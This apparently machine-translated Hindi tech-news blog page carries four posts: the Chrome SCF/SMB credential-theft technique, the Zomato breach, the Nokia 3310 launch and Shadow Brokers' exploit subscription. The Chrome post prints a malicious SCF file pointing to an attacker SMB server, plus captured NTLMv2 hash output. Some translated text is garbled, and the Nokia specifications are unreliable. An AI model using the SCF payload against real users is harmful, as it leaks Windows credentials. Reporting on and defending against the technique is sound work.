Thursday 18 May 2017

BEWARE ! हैकर्स दूरस्थ रूप से क्रोम का उपयोग कर Aapke विंडोज पासवर्ड चोरी कर सकते हैं

2 comments
google-chrome-windows-password-hacking-scf-smb
Thanx To THN
एक सुरक्षा शोधकर्ता ने माइक्रोसॉफ्ट के विंडोज ऑपरेटिंग सिस्टम के किसी भी संस्करण पर चलने वाले Google के क्रोम के नवीनतम संस्करण के डिफ़ॉल्ट कॉन्फ़िगरेशन में गंभीर भेद्यता की खोज की है, जिसमें विंडोज 10 शामिल है, जो दूरस्थ हैकर्स को उपयोगकर्ता के लॉगिन क्रेडेंशियल्स को चोरी करने की इजाजत दे सकता है।

डिफेंसकोड के शोधकर्ता बोस्को स्टेनोकोविक ने पाया है कि एक दुर्भावनापूर्ण एससीएफ फ़ाइल वाली वेबसाइट पर जाकर पीड़ितों को अनजाने में अपने कंप्यूटर के प्रवेश प्रमाण पत्र को क्रोम और एसएमबी प्रोटोकॉल के माध्यम से हैकर्स के साथ साझा कर सकते हैं।

यह तकनीक नई नहीं है और इसका उपयोग स्टक्सनेट - एक शक्तिशाली मैलवेयर द्वारा किया गया था जो विशेष रूप से ईरान के परमाणु प्रोग्राम को नष्ट करने के लिए डिज़ाइन किया गया था - जो सिस्टम को समझौता करने के लिए विंडोज शॉर्टकट एलएनके फ़ाइलों का इस्तेमाल करता था

यह हमला दूसरों से अलग क्यों है यह तथ्य है कि इंटरनेट एक्सप्लोरर (आईई) और एज के बाद, इस तरह के एसएमबी प्रमाणीकरण संबंधित हमलों को सार्वजनिक रूप से पहली बार Google क्रोम पर प्रदर्शित किया गया है।

क्रोम + एससीएफ + एसएमबी = स्टीलिंग विंडोज क्रेडेंशियल्स


एससीएफ (शेल कमांड फाइल) शॉर्टकट फ़ाइल स्वरूप एलएनके फाइलों के समान काम करता है और यह विंडोज एक्सप्लोरर के एक सीमित सेट का समर्थन करने के लिए डिज़ाइन किया गया है जो आपके डेस्कटॉप पर एक आइकन, जैसे मेरा कंप्यूटर और रीसायकल बिन को परिभाषित करने में मदद करता है।

"स्टैनकोविच ने एक ब्लॉग पोस्ट में लिखा," वर्तमान में, हमलावर को पीडि़त (पूरी तरह से अद्यतित Google क्रोम और विंडोज का उपयोग करके) को लुभाने की जरूरत है ताकि वे पीड़ित के प्रमाणीकरण क्रेडेंशियल को आगे बढ़ाने और पुनः उपयोग करने में सक्षम हो सकें। "
असल में, आपके डेस्कटॉप पर शॉर्टकट लिंक्स शैल कोड के विशिष्ट सिंटैक्स वाला एक टेक्स्ट फाइल है जो कि आइकन / थंबनेल, एप्लिकेशन का नाम और उसके स्थान का स्थान निर्धारित करता है।
[शेल]
कमान = 2
IconFile = explorer.exe, 3
चूंकि क्रोम विंडोज एससीएफ फाइलों का भरोसा करता है, हमलावर पीड़ितों को उनकी वेबसाइट पर जा सकते हैं जिसमें दुर्भावनापूर्ण ढंग से तैयार की गई शॉर्टकट फाइल होती है, जो उपयोगकर्ताओं से पुष्टि के बिना स्वचालित रूप से लक्ष्य सिस्टम पर डाउनलोड हो जाती है।

जैसे ही प्रयोक्ता उस फ़ोल्डर को खोलता है जो कि डाउनलोड की गई फ़ाइल को तुरंत या बाद में रखती है, यह फ़ाइल स्वचालित रूप से उस आइकन को बिना उस आइकन पर प्राप्त करने के लिए चलाती है जिस पर उस पर क्लिक किया जाता है

लेकिन किसी आइकन छवि के स्थान को स्थापित करने के बजाय, हमलावर द्वारा बनाई गई दुर्भावनापूर्ण एससीएफ फ़ाइल में एक दूरस्थ SMB सर्वर (हमलावर द्वारा नियंत्रित) का स्थान होता है।

[शेल]
IconFile = \\ 170.170.170.170 \ आइकन
इसलिए, जैसे ही एससीएफ फाइल आइकन की छवि को पुनः प्राप्त करने का प्रयास करता है, यह एसएमबी प्रोटोकॉल पर हमलावर के नियंत्रित रिमोट सर्वर के साथ एक स्वचालित प्रमाणीकरण बनाने की कोशिश करेगा, पीड़ित के उपयोगकर्ता नाम को सौंपेगा और पासवर्ड का हैड किया गया संस्करण देगा, जिससे हमलावर को आपके आपके व्यक्तिगत कंप्यूटर या नेटवर्क संसाधन को प्रमाणित करने के लिए क्रेडेंशियल्स

"रिमोट एसएमबी सर्वर पर एक आइकन स्थान सेट करना एक ज्ञात हमला वेक्टर है जो विंडोज़ स्वचालित प्रमाणन सुविधा को दुर्व्यवहार करता है जब रिमोट फाइल शेयर जैसी सेवाओं तक पहुंचना होता है," स्टैंकोविक ने कहा।

लेकिन स्टक्सनेट के हमलों के बाद, माइक्रोसॉफ्ट ने एलएनके फाइल को केवल स्थानीय संसाधनों से अपने माउस को लोड करने के लिए मजबूर किया क्योंकि वे ऐसे ऐसे हमलों के प्रति अधिक संवेदनशील नहीं रहेंगे जो उन्हें बाहरी सर्वरों से दुर्भावनापूर्ण कोड लोड करने में सक्षम बनाते हैं।

हालांकि, एससीएफ फाइल अकेले छोड़ दी गई थी

एससीएफ फाइल के माध्यम से एलएम / एनटीएलएम हैश प्रमाणीकरण का शोषण

Exploiting LM/NTLM Hash Authentication
छवि स्रोत: एसएएनएस
लेकिन आपके विंडोज पीसी ने आपके क्रेडेंशियल्स को सर्वर पर स्वचालित रूप से हाथ क्यों सौंप दिया?

यदि आप अनजान हैं, तो सर्वर संदेश ब्लॉक (एसएमबी) प्रोटोकॉल के माध्यम से प्रमाणीकरण NTLM चुनौती / प्रतिक्रिया प्रमाणन तंत्र के साथ संयोजन में काम करता है।

संक्षेप में, एलएम / एनटीएलएम प्रमाणीकरण 4 चरणों में काम करता है:

  • विंडोज़ प्रयोक्ता (क्लाइंट) सर्वर में लॉग इन करने का प्रयास करता है
  • सर्वर एक चुनौती मूल्य के साथ प्रतिक्रिया करता है, उपयोगकर्ता को अपने हैश पासवर्ड के साथ चुनौती मान को एन्क्रिप्ट करने और उसे वापस भेजना कहता है।
  • विंडोज एससीएफ अनुरोध को ग्राहक के यूज़रनेम और सर्वर के पासवर्ड के हैशेड संस्करण भेजकर संभालता है।
  • सर्वर तब प्रतिक्रिया को कैप्चर करता है और प्रमाणीकरण को स्वीकार करता है, अगर ग्राहक का हैश पासवर्ड सही है
अब, एससीएफ हमले के परिदृश्य में, स्टैंकोविच द्वारा सविस्तार, विंडोज दुर्भावनापूर्ण SMB सर्वर को स्वचालित रूप से पीड़ित के उपयोगकर्ता नाम और NTLMv2 पासवर्ड हैश (एक निजी कंप्यूटर या नेटवर्क संसाधन) को सर्वर पर प्रमाणित करने का प्रयास करेगा, जैसा कि उपर्युक्त में वर्णित है चरण 3।

अगर उपयोगकर्ता एक कार्पोरेट नेटवर्क का हिस्सा है, तो उपयोगकर्ता को अपनी कंपनी के sysadmin द्वारा निर्दिष्ट नेटवर्क क्रेडेंशियल्स को हमलावर भेज दिया जाएगा।

यदि शिकार घर का उपयोगकर्ता है, तो शिकारकर्ता का विंडोज़ उपयोगकर्ता नाम और पासवर्ड हमलावर को भेज दिया जाएगा।

[*] एसएमबी कैप्चर - 2017-05-15 13:10:44 +0200
173.203.29.182:62521 - 173.203.2 9 .82 से कब्जा कर लिया गया NTLMv2 प्रतिक्रिया
USER: बोस्को डोमेन: मास्टर ओएस: एलएम:
LMHASH: विकलांग
LM_CLIENT_CHALLENGE: विकलांग
NTHASH: 98daf39c3a253bbe4a289e7a746d4b24
NT_CLIENT_CHALLENGE: 01010000000000000e5f83e06fcdd201ccf26d91cd9e326e000000000200000000000
00000000000
Bosko :: मास्टर: 1122334455667788: 98daf39c3a253bbe4a289e7a746d4b24: 01010000000000000e5f83e06fcdd201ccf26d91cd9e326e00000000020000000000000000000000
इसमें कोई संदेह नहीं है, क्रेडेंशियल एन्क्रिप्ट किए गए हैं लेकिन बाद में मूल लॉगिन पासवर्ड को सादे पाठ में पुनर्प्राप्त करने के लिए "जबरदस्ती मजबूर" हो सकता है।
"यह उल्लेखनीय है कि एससीएफ फाइलें विंडोज एक्सप्लोरर में फ़ाइल और फ़ोल्डर सेटिंग्स की परवाह किए बिना विस्तारहीन दिखाई देगा," शोधकर्ता ने कहा। "इसलिए, फ़ाइल नामित picture.jpg.scf विंडोज एक्सप्लोरर में चित्र के रूप में दिखाई देगी। जेपीजी। यह एससीएफ फाइलों के उपयोग से हमलों की अपूर्व प्रकृति को जोड़ती है।"


पासवर्ड को डिक्रिप्ट करने की कोई आवश्यकता नहीं * कभी-कभी *


चूंकि कई माइक्रोसॉफ्ट सर्विसेज अपने हैशेड फॉर्म में पासवर्ड स्वीकार करती है, इसलिए हमलावर एन्क्रिप्टेड पासवर्ड का उपयोग अपने OneDrive, Outlook.com, Office 365, ऑफिस ऑनलाइन, स्काइप, Xbox लाइव और अन्य माइक्रोसॉफ्ट सेवाओं में लॉगिन करने के लिए कर सकते हैं, डिक्रिप्शन अनावश्यक।

शोधकर्ता के अनुसार, इस तरह की कमजोरियों, बड़े संगठनों के लिए गंभीर खतरा पैदा कर सकती हैं क्योंकि वे हमलावरों को अपने सदस्यों में से किसी एक का प्रतिरूपण करने के लिए सक्षम करते हैं, जिससे हमलावरों को तुरंत उपयोग करने के लिए विशेषाधिकारों का पुन: उपयोग करने की इजाजत दी जा सकती है और उनके आईटी संसाधनों का उपयोग और नियंत्रण प्राप्त कर सकते हैं अन्य सदस्यों पर हमले।

ऐसे एसएमबी प्रमाणीकरण संबंधी हमलों को कैसे रोकें?


बस, आउटबाउंड एसएमबी कनेक्शन (टीसीपी बंदरगाहों 13 9 और 445) को स्थानीय नेटवर्क से फायरवॉल के जरिए डब्लूएएन को ब्लॉक करें ताकि स्थानीय कंप्यूटर दूरस्थ एसएमबी सर्वरों को क्वेरी नहीं कर सकें।

Stankovic भी उपयोगकर्ताओं को सलाह देता है कि Google क्रोम में स्वचालित रूप से डाउनलोड अक्षम करने के लिए सेटिंग्स → उन्नत सेटिंग दिखाएं → और तब "पूछें कि कहां से प्रत्येक फ़ाइल को डाउनलोड करने से पहले सहेजना है" विकल्प को चेक करें।

यह परिवर्तन आपको प्रत्येक डाउनलोड प्रयास को मैन्युअल रूप से अनुमोदन देने की अनुमति देगा, जो एससीएफ फाइलों के उपयोग से क्रेडेंशियल चोरी के हमलों के जोखिम को काफी कम कर देगा।

Google भेद्यता के बारे में जानता है और एक पैच पर काम करने के लिए कहा जाता है, लेकिन उपयोगकर्ताओं के लिए पैच उपलब्ध होने पर कोई भी समय सीमा नहीं दी गई है।


Hindi Me latest Hack NeWs Ke Liye Humse Jude Rahiye .
Read More

Zomato Hacked : हैकर ने 17 मिलियन Users के ईमेल और पासवर्ड को Sell में डाल दिया

3 comments
zomato-hacked-data-breach
Thanx To THN
अगर आपने कभी ज़ाटेटो से भोजन का आदेश दिया है, तो आपको चिंता होनी चाहिए!

भारत के सबसे बड़े ऑनलाइन रेस्तरां गाइड ज़ामेतो ने आज पुष्टि की कि कंपनी को डेटा का उल्लंघन हुआ है और यह कि खातों के लाखों उपयोगकर्ताओं का विवरण अपने डाटाबेस से चोरी हो गया है।

आज प्रकाशित एक ब्लॉग पोस्ट में, कंपनी ने कहा कि उसके डेटाबेस से लगभग 17 मिलियन अपने 120 मिलियन उपयोगकर्ता खाते चोरी हुए थे।

किस प्रकार की जानकारी?


चोरी की खाता जानकारी में उपयोगकर्ता के ईमेल पते और साथ ही हैश पासवर्ड शामिल हैं


ज़ामेतो का दावा है कि चूंकि पासवर्ड एन्क्रिप्ट किए जाते हैं, इसलिए यह हमलावरों द्वारा डिक्रिप्ट नहीं किया जा सकता है, इसलिए "आपके पासवर्ड की पवित्रता बरकरार है।"

ऐसा लगता है कि ज़ामेतो खतरे को खारिज कर रहा है या इस तथ्य से अनजान है कि इन दिनों, हैकर्स क्लाउड कंप्यूटिंग का उपयोग कर रहे हैं, जिससे उन्हें कुछ घंटों के भीतर 15-18 वर्ण पासवर्ड भी डिक्रिप्ट करने में मदद मिलती है। तो इसमें कोई गारंटी नहीं है कि आपके पासवर्ड अंततः टूटेंगे नहीं।

अपडेट: जैसा कि ऊपर दिखाए गए स्क्रीनशॉट में दिखाया गया है कि उन्होंने अपने ब्लॉग पोस्ट को अपडेट करने के तुरंत बाद ले लिया, ज़ामेतो ने अपना कथन " आपके पासवर्ड को परिवर्तित / डिक्रिप्ट नहीं किया जा सकता " से " आसानी से परिवर्तित नहीं किया जा सकता " को सादे टेक्स्ट पर वापस कर दिया है।

अद्यतन कथन अब पढ़ता है:

"हम एक हैशिंग एल्गोरिथ्म के साथ हैश पासवर्ड, कई हैशिंग पुनरावृत्तियों और प्रति पासवर्ड के लिए व्यक्तिगत नमक के साथ। इसका मतलब है कि आपका पासवर्ड आसानी से सादे पाठ में परिवर्तित नहीं किया जा सकता है।"
इसके अलावा, ज़ामेतो ने जोर देकर कहा कि भंग किसी भी भुगतान कार्ड के डेटा को प्रभावित नहीं करता है या उसके साथ समझौता नहीं करता है, क्योंकि इसके ग्राहकों की वित्तीय जानकारी अलग-अलग डेटाबेस में संग्रहित होती है जो कि अवैध रूप से उपयोग की गई है।
"ज़माइटो पर भुगतान संबंधी जानकारी को एक अत्यंत सुरक्षित पीसीआई डेटा सुरक्षा मानक (डीएसएस) के अनुरूप वॉल्ट में इस (चोरी) डेटा से अलग से संग्रहित किया गया है। कोई भुगतान जानकारी या क्रेडिट कार्ड डेटा चोरी / लीक नहीं किया गया है," कंपनी का दावा है

डार्क वेब पर बेची जाने वाली 17 मिलियन जुमाटो अकाउंट

17 Million Zomato Accounts Sold on Dark Web

हैक रीड के मुताबिक , " एनकेले " के ऑनलाइन मॉनीकर द्वारा जाने वाला एक उपयोगकर्ता , जिसने ज़ाटेमो का दावा किया है, लोकप्रिय डार्क वेब बाज़ार पर 17 मिलियन पंजीकृत ज़ामेतो प्रयोक्ताओं के डेटा बेच रहा है।

विक्रेता ने लीक डाटाबेस की प्रामाणिकता की पुष्टि करने के लिए एक नमूना डेटा भी साझा किया है और पूरे सेट डेटा के लिए 0.5587 बिटकॉन्स (करीब 1017 डॉलर या ₹ 65,261) के लिए पूछता है।


कंपनी का मानना ​​है कि उसके संगठन के अंदर से कोई व्यक्ति सुरक्षा उल्लंघनों के लिए जिम्मेदार है।
"हमारी टीम सक्रिय रूप से सभी संभावित उल्लंघन वैक्टरों को स्कैन कर रही है और हमारे पर्यावरण में किसी भी अंतराल को बंद कर रही है। अब तक यह आंतरिक (मानव) सुरक्षा उल्लंघन की तरह लग रहा है - कुछ कर्मचारी के विकास खाते में समझौता हुआ है," कंपनी ने कहा।
Read More

Wednesday 17 May 2017

Nokia 3310 Launched In India / Features Or Price Ka Ho Gaya Khulasa

3 comments

नोकिया का सबसे पॉपुलर और टफ बॉडी वाला स्मार्टफोन 3310 भारत में लॉन्च हो गया है. कई दिनों के इंतजार के बाद भारतीय कंज्यूमर्स इसे 18 मई से खरीद सकेंगे.

इन फीचर्स के साथ आया नोकिया 3310

अपनी दमदार बैटरी के लिए जानने वाले 3310 में 1,200mAh की बैटरी है. कंपनी का कहना है कि इसकी बैटरी एक दिन का टॉक टाइम (फोन पर बात करने पर) और महीने भर का स्टैंडबाइ बैअकप (कॉल नहीं करते हैं) देगी.

बता दें कि कंपनी ने इसके मॉडल नंबर पर ही इसकी कीमत रखी है. कंज्यूमर्स इसे 3310 रु में खरीद सकते हैं.

देखें कितना बदल के वापस आया है नोकिया 3310

16GB की इंटरनल मेमोरी

फीचर्स की बात करें तो इस फोन में 2.4 इंच की कर्व्ड डिस्पले है.  कॉलिंग और मैसेजिंग के लिए 2G कनेक्टिविटी दी गई है. इस फोन में 16GB की इंटरनल मेमोरी दी गई है जिसे 32GB तक बढ़ाया जा सकता है.

कंपनी ने फोन को डुअल सिम सपोर्ट के साथ लॉन्च किया है, जिसमें दो सिम लगाने का ऑप्शन है. कैमरे की बात करें तो इसके अपग्रेडेड वर्जन में 2 मेगापिक्सल का कैमरा भी दिया गया है.

नोकिया 3310 में 3.5 mm की हेडफोन जैक, एलईडी फ्लैश लाइट और साथ ही इसमें इसका सबसे पॉपुलर स्नेक गेम भी मौजूद है.

कस्टमर्स इसे चार बेहतरीन शेड्स ग्लॉस फीनीशिंग में  रेड और यलो, मैट फीनीशिंग में डार्क ब्लू और ग्रे में खरीद सकते हैं.
Read More

Tuesday 16 May 2017

Shadow Brokers, Who Leaked WannaCry SMB Exploit, Are Back

3 comments
the-shodow-brokers-wannacry-hacking
Thanx To THN
The infamous hacking collective Shadow Brokers – the one who leaked the Windows SMB exploit in public that led to last weekend's WannaCrypt menace – are back, this time, to cause more damage.

In typically broken English, the Shadow Brokers published a fresh statement (with full of frustration) a few hours ago, promising to release more zero-day bugs and exploits for various desktop and mobile platforms starting from June 2017.

However, this time the Shadow Brokers leaks will not be available for everybody, as the hacking collective said:
"TheShadowBrokers is launching new monthly subscription model. Is being like [the] wine of month club. Each month peoples can be paying membership fee, then getting members only data dump each month."
 To some extent, this is good news, but it is terrible news too. Good because now all these upcoming alleged unpatched vulnerabilities will be patched after being disclosed and terrible because the group will sell new zero-day exploits and hacking tools to private members with paid monthly subscription, instead of telling them to Microsoft.


Apparently, other hackers, criminal gangs, state-sponsored hackers, maybe some journalists and people from tech companies, would naturally join Shadow Brokers' membership.

Get Ready for the 'Wine of Month Club'


So, anyone buying the membership of the "wine of month club" would be able to get exclusive access to the upcoming leaks, which the Shadow Brokers claims would include:

  • Exploits for web browsers, routers, and smartphones.
  • Exploits for operating systems, including Windows 10.
  • Compromised data from banks and Swift providers.
  • Stolen network information from Russian, Chinese, Iranian, and North Korean nuclear missile programs.

The claims made by the group remain unverified at the time of writing, but since the Shadow Brokers' previously released data dump turned out to be legitimate, the group's statement should be taken seriously, at least now, when we know the EternalBlue exploit and DoublePulsar backdoor developed by the NSA and released by the Shadow Brokers last month was used by WannaCry to cause chaos worldwide.

Before publicly dumping these exploits in April, the Shadow Brokers put an auction of cyber weapons stolen from NSA’s elite hacking team called Equation Group for 1 Million Bitcoin.

After failed auction, the hacking group even put up those hacking tools and exploits for direct sale on an underground site, categorizing them into a type — like "exploits," "Trojans," and "implant" — each of which ranged from 1 to 100 Bitcoins (from $780 to $78,000).
After failure from all sides, the group started leaking those hacking exploits. Last month, the Shadow Brokers released a Microsoft Windows SMB exploit that was used by the WannaCry ransomware, which infected 200,000 machines in 150 countries within just 48 hours.

While talking about the WannaCry ties with North Korean state-sponsored hacking group Lazarus Group, the group said:

"The Oracle is telling theshadowbrokers North Korea is being responsible for the global cyber attack Wanna Cry. Nukes and cyber attacks, America has to go to war, no other choices!"

Shadow Brokers Lashed out on US Government and Tech Companies


In its recent post, the Shadow Brokers criticized both the US government and tech companies, such as Microsoft, for not cracking down on the exploits when they had the chance, months before their release.

The hacking group said the US government is paying tech companies not to patch zero-days in their products, claiming that it has spies inside Microsoft among other US tech firms.

The Shadow Brokers even accused Google Project Zero team, saying:

"TheShadowBrokers is thinking Google Project Zero is having some former TheEquationGroup member. Project Zero recently releasing "Wormable Zero-Day" Microsoft patching in record time, knowing it was coming? Coincidence?"

Who knows if these accusation made by the Shadow Brokers group are true or not, but the world should be well prepared for another WannaCry-like massive destroyer.
Read More